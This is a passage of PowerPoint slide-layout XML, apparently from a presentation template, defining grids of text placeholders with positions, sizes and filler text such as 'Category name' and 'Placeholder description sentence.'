          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10021203" y="2191808"/>
            <a:ext cx="1573747" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2814600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12 Categor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78" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EAD6BC7-4183-B0E1-B099-643C4320BC29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="1958865"/>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80" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE945620-81EA-AB2F-7AC2-1747EFA6F570}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="1476654"/>
            <a:ext cx="1892962"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defTabSz="914367" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Category name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34070BF6-A8FD-95B9-AD36-0CE8C32D1557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622158" y="1958865"/>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87" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90BDD1A3-4783-F512-FA2D-6120D8053B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622157" y="1476654"/>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88" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6518B60-5444-FDB0-B37A-84A07023314B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8644256" y="1958865"/>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89" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A91FF6F-7162-B0B7-6675-98E8DB14C007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8644256" y="1476654"/>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0" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{290E6748-02E1-AF64-F54B-744442D28F3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="3586862"/>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1" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E80487-0686-AEB9-4EE7-6628B698BE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="3104651"/>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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA048349-1606-3104-F0F8-5E93131C4E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622158" y="3586862"/>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3" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E957245-BBCB-A969-0F93-023F47C64F70}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622157" y="3104651"/>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4" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88B3E57E-7E61-3FEB-300A-FD6EBC4CC200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8644256" y="3586862"/>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5" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4571A1D-1773-F21A-A3EA-B3B217B56B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8644256" y="3104651"/>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6" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34ADA56A-5CA5-2E71-AF08-91FEF6494DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="5218904"/>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7" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9FF409A-5D40-11FD-3FEE-1DBDAE5B1A78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059" y="4736693"/>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8" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A239280-D111-6BFB-B935-B69DEFE05494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="33"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622158" y="5218904"/>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9" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B0A469-38CF-F755-FFB9-3A6F05849ECB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="34" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4622157" y="4736693"/>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100" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC2D1FE-4A58-8C57-3B5C-52B679B04E78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8644256" y="5218904"/>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101" name="Text Placeholder 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8437668-BA08-31C4-C902-25C0D56C55AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="36" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8644256" y="4736693"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3764580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25 Categor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86" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34070BF6-A8FD-95B9-AD36-0CE8C32D1557}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059"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8" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{085ABBA4-F460-2B2F-5ADB-334A111C0194}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059"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9" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0022780F-B1B3-EA04-033C-CD5CD6090E7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059"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0" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA7BC9E-EF68-E545-3785-1C666261A602}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059"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1" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66A30E29-5096-CF74-EA85-C459AE996592}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="600059"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7" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A6758D-E23B-B789-5B49-246214E4943A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="26" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894396"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8" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB27D39-1D20-E091-E442-4A4168E2B490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="27" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894396"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9" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E34650-9454-CBB1-4CED-B3082C7374C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894396"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0" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10511439-6230-65E2-CB47-85E2B42F8CA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894396"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1" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80C0ED3F-7668-E7B0-8569-7B77EE68C890}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894396"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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9C74FD8-DBA3-7B2D-E9E3-66F944C03802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="31" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188733"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3" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03655FBC-9F94-4B54-91CD-4E4BB55901AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188733"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4" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2446003A-F3C2-997F-79D0-8B4A265530BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="33" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188733"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5" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63023DED-B9F5-EB00-86A2-4BD622B5E1E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="34" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188733"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6" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48A93441-5884-0F87-E6E1-B581AF20BABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="35" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5188733"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7" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F509884-E930-F3CF-6DA3-3E7DB3BD2CA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="36" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483070"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8" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7113043-2348-3BB7-5DF6-9EC843C02FB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="37" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483070"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9" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AF3D7C0-232A-374C-D5A6-BBFBD1E388AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="38" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483070"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0" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC7F461E-C7C8-1723-E1D2-6C4DA6C05E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="39" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483070"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1" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E2EA64A-6BC5-A399-A55F-EC399F299BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="40" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7483070"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2" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E213BBF9-D972-DB69-495B-F6FD74A8B989}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="41" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9777407"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3" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBF9B2B9-C699-2AAF-B1AC-AD28BF3C9474}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="42" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9777407"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4" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA55F8C3-F356-9599-D353-1C663EFE93A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="43" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9777407"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5" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2483AB3F-AEDD-BD4D-038C-FF115E9FE349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="44" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9777407"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6" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354F9B38-E8F5-A8EA-BB41-976D95497C9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="45" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9777407"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7" name="Text Placeholder 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A97073-7400-F14B-D052-6D85C962F3D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="596951" y="1138872"/>
            <a:ext cx="11239463" cy="411155"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="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Placeholder description sentence.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198101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Text +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8" y="2343603"/>
            <a:ext cx="4527527" cy="1003352"/>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5" name="Text Placeholder 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7F59AA4-E616-8510-AAB5-12D71B9D7D93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
